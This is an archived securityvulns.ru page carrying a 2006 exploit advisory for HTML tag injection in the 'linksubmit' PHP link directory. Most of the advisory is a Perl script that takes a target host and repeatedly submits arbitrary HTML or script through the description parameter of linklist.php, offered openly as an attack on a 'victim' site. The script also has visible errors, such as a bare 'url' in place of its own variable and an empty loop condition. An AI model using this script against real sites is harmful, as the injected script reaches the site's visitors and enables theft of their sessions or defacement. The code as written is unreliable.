Computer Security
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  Warcraft III Replay Parser Script Remote Command Exucetion Vulnerability And Cross-Site Scripting Attacking

  SiteMan <= All version SQL injection in admin_login.asp

  FleXiBle Development Script Remote Command Exucetion And XSS Attacking

  DbbS<=2.0-alpha SQL injection

From:ali_(at)_hackerz.ir <ali_(at)_hackerz.ir>
Date:02.04.2006
Subject:linksubmit <= All version Html Tag Injector in index.php

Vendor : linksubmit
Version : All Version
www : http://www.phpselect.com
AUTHOR : s3rv3r_hack3r
you can submit html tag's in $description  (linksubmit.php)

Exploit :
#!/usr/bin/perl
#
# Exploit by s3rv3r_hack3r
# Special Thanx : hessamx , f0rk ,sattar.li , stanic, mfox,blood moon and..
######################################################
#  ___ ___                __                         #
# /   |   \_____    ____ |  | __ ___________________ #
#/    ~    \__  \ _/ ___\|  |/ // __ \_  __ \___   / #
#\    Y    // __ \\  \___|    <\  ___/|  | \//    /  #
# \___|_  /(____  )\___  >__|_ \\___  >__|  /_____ \ #
#       \/      \/     \/     \/    \/            \/ #
#             Iran Hackerz Security Team             #
#               WebSite: www.hackerz.ir              #
######################################################
# Name    : linksubmit                               #
# Site    : http://www.phpselect.com/                #
######################################################
#you can use iframe,script and all html tags
#bug in linklist.php !!
#www.victim.com/linklist
use LWP::Simple;


print "-------------------------------------------\n";
print "=      Iran hacekerz security team        =\n";
print "=   By s3rv3r_hack3r  - www.hackerz.ir    =\n";
print "-------------------------------------------\n\n";


     print "Target >http://";
     chomp($targ = <STDIN>);
     print "your web site name >";
     chomp($wwwname= <STDIN>);
     print "your web site url >";
     chomp($wsurl= <STDIN>);
     print "your email >";
     chomp($mail= <STDIN>);
  
  $con=get("http://".$targ."/linklist.php") || die "[-]Cannot connect to Host";
while ()  
{  
    print "Html code\$";
    chomp($comd=<STDIN>);
    $commd=get("http://".$targ."/linklist.php?wsname=".
$wwwname."&wsurl=".url."&email=".$mail.
"&description=".$comd)
}

About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 



Rating@Mail.ru